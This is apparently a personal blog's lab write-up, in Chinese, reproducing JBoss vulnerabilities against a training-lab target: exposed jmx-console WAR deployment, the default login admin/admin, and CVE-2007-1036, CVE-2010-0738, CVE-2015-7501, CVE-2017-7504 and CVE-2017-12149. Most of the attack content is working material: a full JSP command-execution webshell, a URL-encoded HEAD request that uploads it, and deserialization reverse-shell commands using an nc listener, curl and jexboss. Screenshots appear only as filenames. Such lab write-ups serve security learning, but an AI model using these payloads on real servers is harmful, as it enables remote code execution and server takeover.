jboss漏洞整理

jboss 漏洞复现

jmx-console

image-20240209194431332

发现后台就直接访问后后台,然后尝试部署war包

image-20240209195016808

image-20240209194948829

image-20240209195057978

image-20240209195118722

image-20240209195257269
image-20240209195348273

利用成功

jboss-WeakPasswd

尝试访问console 的时候发现

image-20240209195558569

尝试

admin/admin

image-20240209195921556

之后的操作就和上面的一样了

CVE-2007-1036

0x00 漏洞简介

此漏洞主要是由于JBoss中 /jmx-console/HtmlAdaptor 路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能。该漏洞利用的是后台中 jboss.admin ->DeploymentFileRepository -> store() 方法,通过向四个参数传入信息,达到上传shell的目的,其中arg0传入的是部署的war包名字,arg1传入的是上传的文件的文件名,arg2传入的是上传文件的文件格式,arg3传入的是上传文件中的内容。通过控制这四个参数即可上传shell,控制整台服务器。但是通过实验发现,arg1和arg2可以进行文件的拼接,例如 arg1=she,arg2=ll.jsp 。这个时候服务器还是会进行拼接,将 shell.jsp 传入到指定路径下。

0x01 影响版本

jboss4.x以下

0x02 漏洞利用

使用payload

http://xx.xx.xx.xx/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin:service=DeploymentFileRepository

image-20240209200238153

1
2
3
4
5
p1   job1.war
p2   job1
p3   .jsp
p4   <%@ page import="java.io.*" %> 
<% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s +"\r\n"; } } catch(IOException e) { e.printStackTrace(); } } out.println(output);%>

填写对应的地方

image-20240209200419314

image-20240209200433971

image-20240209200510583

访问成功

CVE-2010-0738

0x00 漏洞简介

利用原理与CVE-2007-1036相同,只不过利用HEAD请求方法绕过GET和POST请求的限制

0x01 影响版本

jboss4.2.0-jboss4.3.0

0x02

payload

1
2
3
4
5
6
7
8
9
10
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=../jmx-console.war/&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%20%25%3e%20%0d%0a%3c%25%20%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%3b%20%53%74%72%69%6e%67%20%6f%75%74%70%75%74%20%3d%20%22%22%3b%20%69%66%28%63%6d%64%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%73%20%3d%20%6e%75%6c%6c%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%63%6d%64%29%3b%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%73%49%20%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%77%68%69%6c%65%28%28%73%20%3d%20%73%49%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%70%75%74%20%2b%3d%20%73%20%2b%22%5c%72%5c%6e%22%3b%20%7d%20%7d%20%63%61%74%63%68%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%20%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%20%7d%20%7d%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6f%75%74%70%75%74%29%3b%25%3e&arg4=True HTTP/1.1
Host: target.yijinglab.com:51783
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,la;q=0.8,en;q=0.7
Connection: close

尝试访问

target.yijinglab.com:51783/jmx-console/shell.jsp?cmd=id

image-20240209201812130

CVE-2017-7504

0x00 漏洞复现

http://ip:port/invoker/JMXInvokerServlet,返回如下的response,说明接口是开放的,此接口存在漏洞

尝试访问,会下载东西,说明存在相对应的漏洞

0x01 使用JavaDeserH2HC利用

1
2
3
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port

开启监听,要和上面设置的端口是一致的

1
nc -lvvp port

尝试访问

1
curl http://xx.xx.xx.xx:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

image-20240209204716696

CVE-2015-7501

0x00

和上面的基本一致,只是使用的接口不一样而已

1
curl http://xx.xx.xx.xx:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

CVE-2017-12149

0x00 漏洞发现

访问http://ip:port/invoker/readonly,若返回如下显示状态码为500的报错界面,则证明漏洞存在

image-20240209210214605

发现存在

0x01 

1
curl http://IP地址:端口/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用对应的接口进行反序列化

CVE-2017-12149 JBoss AS 5.X&#47;6.X反序列化漏洞

0x00 信息收集

由于知道ip,所以也没有什么可以收集的

就只用收集一个端口信息

image-20240209212321013

发现8080端口尝试访问

image-20240209212447225

通过jbossScan扫描

image-20240209213003709

发现存在CVE-2017-12149

image-20240209213111210

出现了500 说明存在该漏洞

0x01

尝试利用

image-20240209213449302

制作反序列化的时候出现这个问题,尝试转换java版本、

image-20240209213607569

然后重新运行

访问

1
curl http://目标IP:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

尝试使用jexboss

1
python3 jexboss.py -u http://10.1.1.121:8080

image-20240209220335030

反弹成功

#整理
jboss漏洞整理
https://tsy244.github.io/2024/02/09/整理/jboss漏洞整理/
Author
August Rosenberg
Posted on
February 9, 2024
Licensed under